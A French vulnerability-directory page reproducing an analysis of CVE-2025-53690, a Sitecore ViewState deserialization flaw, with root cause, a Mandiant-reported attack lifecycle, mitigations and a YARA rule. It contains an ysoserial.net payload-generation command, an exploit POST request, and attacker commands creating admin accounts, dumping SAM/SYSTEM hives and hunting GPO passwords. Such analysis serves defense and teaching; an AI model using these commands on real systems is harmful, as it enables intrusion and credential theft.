Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
CVE-2025-53690-Analysis — Ce sont les documents d'analyse de CVE-2025-53690. | Kitploit
Outils/GitHubGitHub/m0d0ri205/cve-2025-53690-analysis
Analyse des VulnérabilitésExploitationExploitation d'Applications WebAnalyse ForensiqueAnalyse de MalwareTests d'IntrusionApprentissage et ÉducationRed TeamingRéponse aux Incidents
GitHubm0d0ri205/cve-2025-53690-analysis

CVE-2025-53690-Analysis

Ce sont les documents d'analyse de CVE-2025-53690.

34il y a 1 anPas encore vérifié
Voir le dépôt

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager

CVE-2025-53690 : Analyse de la vulnérabilité de désérialisation ViewState de Sitecore

Aperçu

CVE-2025-53690 est une vulnérabilité de désérialisation ViewState découverte dans la gamme de produits Sitecore. Elle exploite une clé machine ASP.NET exposée pour permettre une exécution de code à distance, constituant une faille de sécurité critique.

Informations de base

  • ID CVE : CVE-2025-53690
  • Score CVSS : 9,0 (Critique)
  • Type de vulnérabilité : Désérialisation de données non fiables (CWE-502)
  • Date de découverte : Septembre 2025
  • Date de publication : 3 septembre 2025
  • Exploitation réelle : Exploitée en tant que zero-day depuis décembre 2024

Produits concernés

  • Sitecore Experience Manager (XM) - toutes versions 9.0 et antérieures
  • Sitecore Experience Platform (XP) - toutes versions 9.0 et antérieures
  • Sitecore Experience Commerce (XC)
  • Sitecore Managed Cloud
  • Module Active Directory 1.4 et antérieur

Analyse détaillée de la vulnérabilité

Cause racine

Le cœur de cette vulnérabilité réside dans une mauvaise gestion de configuration :

  1. Utilisation de clés machine d’exemple : Les clés machine ASP.NET fournies en exemple dans les guides de déploiement Sitecore antérieurs à 2017 ont été utilisées telles quelles en production.
  2. Réutilisation de clés statiques : La même clé machine est réutilisée sur plusieurs déploiements.
  3. Contournement de la validation ViewState : Les clés exposées permettent de contourner la validation d’intégrité ViewState.

Mécanisme ViewState ASP.NET

ViewState est une fonctionnalité de gestion d’état d’ASP.NET qui :

  • Stocke l’état de la page dans un champ caché __VIEWSTATE
  • Utilise la clé machine pour garantir intégrité et confidentialité
  • Le serveur désérialise le ViewState pour restaurer l’état de la page
root@kitploit:~
<!-- Exemple de web.config -->
<system.web>
    <machineKey 
        validationKey="[clé de 64 octets]"
        decryptionKey="[clé de 48 octets]"
        validation="HMACSHA256" 
        decryption="AES" />
</system.web>

Vecteurs d’attaque

1. Identification des points de terminaison vulnérables

root@kitploit:~
Target: /sitecore/blocked.aspx
Method: POST
Caractéristiques : accessible sans authentification, utilise ViewState

2. Génération d’une charge utile ViewState malveillante

L’attaquant utilise la clé machine connue et ysoserial.net pour générer une charge utile malveillante :

root@kitploit:~
# Exemple d’utilisation de ysoserial.net
ysoserial.exe -f ViewState -g TypeConfuseDelegate -c "calc.exe" --validationkey="[clé]" --validationalg="HMACSHA256" --decryptionkey="[clé]" --decryptionalg="AES"

3. Envoi de la requête HTTP

root@kitploit:~
POST /sitecore/blocked.aspx HTTP/1.1
Host: target.com
Content-Type: application/x-www-form-urlencoded

__VIEWSTATE=[charge_utile_malveillante]&__VIEWSTATEGENERATOR=[valeur]

Analyse d’un cas d’attaque réel (Rapport Mandiant)

Cycle de vie de l’attaque

Phase 1 : Pénétration initiale

  • Point de terminaison : /sitecore/blocked.aspx
  • Méthode : Attaque par désérialisation ViewState
  • Privilège : NETWORK SERVICE (processus de travail IIS)
  • Charge utile : Outil de reconnaissance WEEPSTEEL

Phase 2 : Reconnaissance et établissement d’une base

root@kitploit:~
# Commandes exécutées
whoami
hostname  
net user
tasklist
ipconfig /all
netstat -ano
net group "domain admins"

Outils déployés :

  • 7za.exe : outil de compression de fichiers
  • lfe.ico : outil de tunneling réseau EARTHWORM
  • 1.vbs : VBScript pour l’exécution de commandes

Phase 3 : Élévation de privilèges

root@kitploit:~
# Création d’un compte administrateur local
net user asp$ [mot_de_passe] /add
net localgroup administrators asp$ /add

net user sawadmin [mot_de_passe] /add  
net localgroup administrators sawadmin /add

Collecte d’identifiants :

root@kitploit:~
reg save HKLM\SYSTEM c:\users\public\system.hive
reg save HKLM\SAM c:\users\public\sam.hive

Phase 4 : Persistance

  • Accès RDP : utilisation des comptes administrateurs créés
  • DWAGENT : installation d’un outil d’accès à distance (enregistré en tant que service avec privilège SYSTEM)
  • Modification des paramètres du compte :
root@kitploit:~
net user [AdminUser] /passwordchg:no /expires:never
wmic useraccount where name='[AdminUser]' set PasswordExpires=False

Phase 5 : Reconnaissance interne

root@kitploit:~
# Identification du contrôleur de domaine
nltest /DCLIST:[domaine]
nslookup [contrôleur-de-domaine]

# Recherche de cpassword dans les GPO (attaque des préférences de stratégie de groupe)
findstr /S /l cpassword \\[DC]\sysvol\[domaine]\policies\*.xml

# Exécution de BloodHound/SharpHound
sh.exe -c all

Phase 6 : Mouvement latéral

  • Accès RDP à d’autres systèmes avec des comptes administrateurs de domaine volés
  • Contournement de la sécurité par tunneling réseau via EARTHWORM

Analyse des outils utilisés

WEEPSTEEL (outil de reconnaissance)

root@kitploit:~
// Informations collectées
Information.BasicsInfo basicsInfo = new Information.BasicsInfo
{
    Directories = new Information.Directories
    {
        CurrentWebDirectory = HostingEnvironment.MapPath("~/")
    },
    OperatingSystemInformation = Information.GetOperatingSystemInformation(),
    DiskInformation = Information.GetDiskInformation(),
    NetworkAdapterInformation = Information.GetNetworkAdapterInformation(),
    Process = Information.GetProcessInformation()
};

Mode de sortie : dissimulation des données en se faisant passer pour un ViewState

root@kitploit:~
<input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" 
       value="/wEPDwUKLTcyODc4{sortie chiffrée AES + encodée en base64}" />

EARTHWORM (tunneling réseau)

  • Fonction de serveur proxy SOCKS v5
  • Contournement du pare-feu et dissimulation du trafic
  • Tunnel du trafic RDP pour éviter la détection

DWAGENT (accès à distance)

  • Outil d’administration à distance légitime
  • Enregistré en tant que service avec privilège SYSTEM
  • Persistance via démarrage automatique

SHARPHOUND (reconnaissance AD)

  • Outil de collecte de données pour BloodHound
  • Cartographie de l’environnement Active Directory
  • Identification des chemins d’attaque

Mesures de défense et d’atténuation

Actions immédiates

root@kitploit:~
<!-- Générer une clé machine unique -->
<machineKey 
    validationKey="[nouvelle_clé_64_octets]"
    decryptionKey="[nouvelle_clé_48_octets]"
    validation="HMACSHA256" 
    decryption="AES" />

Mesures de renforcement de la sécurité

  1. Rotation automatisée des clés
  2. Activation de la validation MAC ViewState
  3. Chiffrement des fichiers de configuration
  4. Segmentation réseau
  5. Renforcement de la surveillance

Règles de détection

root@kitploit:~
# Exemple de règle YARA (détection de WEEPSTEEL)
rule WEEPSTEEL_Detection {
    strings:
        $viewstate = "__VIEWSTATE"
        $crypto = "System.Security.Cryptography"
        $serializer = "JavaScriptSerializer"
    condition:
        all of them
}

Conclusion

CVE-2025-53690 est un exemple frappant de la façon dont une simple erreur de configuration peut conduire à une menace de sécurité critique. À travers cette vulnérabilité, les apprenants peuvent observer le cycle de vie complet d’une attaque APT réelle et comprendre les techniques d’attaque modernes ainsi que les stratégies de défense.

Références

  • Google Cloud Blog - ViewState Deserialization Zero-Day
  • Bulletin Sitecore SC2025-005
  • Catalogue des vulnérabilités exploitées connues de CISA
  • ysoserial.net
  • Blog sur la sécurité Microsoft - Clés machine ASP.NET
Télécharger l’outil